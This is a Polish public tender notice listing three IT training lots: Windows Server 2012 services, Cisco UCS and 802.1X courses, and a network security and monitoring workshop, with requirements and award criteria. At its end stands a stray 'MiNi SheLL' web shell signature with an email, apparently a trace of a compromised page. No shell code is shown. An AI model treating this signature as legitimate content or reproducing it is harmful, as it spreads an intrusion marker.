<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Technologia Microsoft.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Zaawansowane konfigurowanie Usług w Windows Server 2012: - dla 6 osób - (min. 40 godzin),
Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia 20412 Configuring Advanced Windows Server 2012 Services i zawierać przynajmniej:
	Implementacja zaawansowanych usług sieciowych 
	konfigurowanie zaawansowanych funkcji DHCP
	konfigurowanie zaawansowanych funkcji DNS.
	Wdrażania zaawansowanych usług plikowych 
	konfiguracja iSCSI
	konfigurowanie Branch Cache
	optymalizacja wykorzystania pamięci masowych.
	Implementacja dynamicznej kontroli dostępu 
	omówienie dynamicznej kontroli dostępu
	planowanie wdrożenia dynamicznej kontroli dostępu
	konfigurowanie dynamicznej kontroli dostępu.
	Implementacja równoważenia obciążenia sieciowego 
	omówienie równoważenia obciążenia sieciowego 
	konfigurowanie klastra równoważenia obciążenia sieciowego
	planowanie wdrożenia równoważenia obciążenia sieciowego.
	Wdrażanie Failover Clustering 
	omówienie Failover Clustering
	implementacja Failover Clustering
	konfigurowanie wysokiej dostępności aplikacji i usług w Failover Clustering
	utrzymanie Failover Clustering
	implementacja rozproszonego Failover Clustering.
	Wdrażanie Failover Clustering z Hyper-V 
	omówienie integracji Hyper-V z Failover Clustering
	implementacja maszyn wirtualnych na klastrze
	implementacja przenoszenia maszyn wirtualnych
	zarządzanie środowiskiem wirtualnym za pomocą System Center Virtual Machine Manager.
	Wdrażanie odzyskiwania po awarii 
	omówienie odzyskiwania po awarii
	implementacja Windows Server Backup
	implementacja odzyskiwania serwera i danych.
	Implementacja rozproszonych wdrożeń AD DS 
	omówienie rozproszonych wdrożeń AD DS
	implementacja rozproszonych wdrożeń AD DS
	konfigurowanie trustów AD DS.
	Implementacja siteów AD DS i replikacji 
	omówienie replikacji usług AD DS
	konfiguracja siteów AD DS
	konfigurowanie i monitorowanie replikacji.
	Wdrożenie AD CS 
	omówienie infrastruktury klucza publicznego 
	wdrażanie urzędów certyfikacji
	wdrażanie i zarządzanie szablonami certyfikatów
	implementacja dystrybucji i unieważniania certyfikatu
	zarządzanie odzyskiwaniem certyfikatów.

	Implementacja usług AD RMS 
	omówienie Active Directory Rights Management
	wdrażanie i zarządzanie infrastrukturą AD RMS 
	konfigurowanie ochrony zawartości w AD RMS
	konfigurowanie dostępu z zewnątrz do AD RMS.
	Implementacja usług AD FS 
	omówienie Active Directory Federation Services
	wdrażanie Active Directory Federation Services
	implementacja AD FS dla organizacji
wdrażanie scenariusza AD FS między przedsiębiorstwami. 
 Dodatkowe wymagania:
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	szkolenia obejmą część teoretyczną oraz praktyczną,
	szkolenie musi być autoryzowane przez Microsoft, prowadzone przez autoryzowanych instruktorów,
	szkolenie musi być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator szkoleń wyda certyfikat ukończenia autoryzowanego szkolenia,
Zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata),
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. DOŚWIADCZENIE W PRZEPROWADZANIU SZKOLEŃ - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Technologia Cisco.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Rozwiązywanie problemów w serwerach UCS - dla 2 osób - (min. 24 godziny) + Egzamin certyfikacyjny Cisco: 300-101 Route 
Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia  Cisco Troubleshooting Cisco Data Center Unified Computing i zawierać przynajmniej:
	Rozwiązywanie problemów z Cisco UCS B-Series 
	Rozwiązywanie problemów z architekturą i inicjalizacją
	Rozwiązywanie problemów z konfiguracją
	Rozwiązywanie problemów operacyjnych
	Rozwiązywanie problemów z połączeniami LAN i SAN
	Rozwiązywanie problemów z UCS Managerem oraz podnoszenie wersji      oprogramowania
	Rozwiązywanie problemów ze sprzętem
	Rozwiązywanie problemów z Cisco UCS C-Series

	Cisco UCS C-Series architektura i konfiguracja
	Rozwiązywanie problemów ze sprzętem i oprogramowaniem typu Firmware
	Rozwiązywanie problemów z połączeniami LAN i SAN
	Rozwiązywanie problemów z lokalnymi dyskami
	Rozwiązywanie problemów - kwestie związane z Systemami Operacyjnymi 
	Rozwiązywanie problemów z integracją Cisco UCS C-Series

	Integracja Cisco UCS C-Series and Cisco UCS Manager (architektura, instalacja, weryfikacja)
	Rozwiązywanie problemów z integracją Cisco UCS C-Series oraz Cisco UCS Manager (problemy z urządzeniami FEX, problemy z serwerami serii C)
	Szkolenie Wprowadzenie do technologii  802.1X w urządzeniach Cisco: - dla 2 osób - (min. 24 godziny) +  Egzamin certyfikacyjny Cisco: 300-115 Switch, 

Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia Cisco Introduction to 802.1X Operations for Cisco Security Professionals i  zawierać przynajmniej:

	Wstęp do zagadnień uwierzytelniania sieciowego 
	Architektura Cisco TrustSec
	Protokół IEEE 802.1X
	Protokoły uwierzyleniania opearte o Extensible Authentication Protocol (EAP)
	Rola protokołu RADIUS w rozwiązaniach opartych o EAP
	Oprogramowanie Cisco Identity Services Engine (ISE) i jego rola w architekturze TrustSec
	Przykłady konfiguracji w rozwiazaniach kablowych (Wired) w oparciu o przełączniki Catalyst
	Przykłady konfiguracji w rozwiązaniach bezprzewodowych (Wireless) w oparciu o koncentratory WLC

Dodatkowe wymagania (dotyczy pkt a i b):
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	szkolenia obejmą część teoretyczną oraz praktyczną,
	szkolenia muszą być autoryzowane przez Cisco, prowadzone przez autoryzowanych instruktorów,
	szkolenia muszą być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator szkoleń wyda certyfikat ukończenia autoryzowanego szkolenia,
	zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
	Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata), 
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. DOŚWIADCZENIE W PRZEPROWADZANIU SKZOLEŃ - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bezpieczeństwo teleinformatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bezpieczeństwo i monitorowanie sieci komputerowych - dla 10 osób (2 grupy po 5 osób w 2 różnych terminach) - (min. 40 godzin),

Program szkolenia powinien  zawierać przynajmniej:
 Elementy bezpieczeństwa LAN
- Bezpieczenstwo fizyczne
- Granica zaufania
 Zagrożenia w sieciach LAN
- Ataki na poszczególne warstwy modelu ISO/OSI
 Koncepcja AAA (Authentication, Authorization, Accounting)
 Rozliczanie - Accounting
- Monitoring i logowanie w sieciach LAN
- Obsługa zdarzeń
- Klasyfikacja zdarzeń
- Analiza i korelacja zdarzeń
 Autoryzacja - Authorization
- Listy dostępu ACL
- Zapory sieciowe
- Serwery usług
- Prawa użytkowników w systemach operacyjnych na przykładzie MS W2008 Server
 Uwierzytelnianie - Authentication
- Elementy infrastruktury klucza publicznego
- Technologie w PKI
- PKI w praktyce
- źródła uwierzytelniania
- Lokalne bazy użytkowników
- Serwery katalogowe
- PKI
- Hasła jednorazowe, tokeny
- Systemy hybrydowe - NAC, NAP
 Systemy realizujące wybrane funkcje AAA
- RADIUS - Zliczanie aktywności użytkowników
- 802.1x - kontrola dostępu i uwierzytelnianie
- Architektura systemu
- Serwer RADIUS
- Implementacje w sieciach przewodowych i bezprzewodowych
 System Firewall
- typy Firewalli
- konfiguracja Firewalla
- systemy UTM
 Konfiguracja urządzeń sieciowych pod kątem monitorowania i analizy ruchu
Systemy wykrywania włamań
- IDS hostowy
- IDS sieciowy
- określanie zasad monitorowania zdarzeń
- reakcje na incydent
 HoneyPot
- typy honeypotów
- instalacja i konfiguracja
Kontrola ruchu sieciowego
- analiza ruchu sieciowego
- natężenie ruchu i statystki
- SNMP w analizie ruchu sieciowego
- RMON
- Netflow
- Sflow
 Zarzadzanie logami
- logi systemowe
- logi z systemów bezpieczeństwa
- archiwizacja logów

Dodatkowe wymagania:
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	warsztaty obejmą część teoretyczną oraz praktyczną,
	warsztaty muszą być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator warsztatów wyda certyfikat ukończenia warsztatów,
	Zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
	Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata),
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. DOŚWIADCZENIE W PRZEPROWADZANIU SZKOLEŃ - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com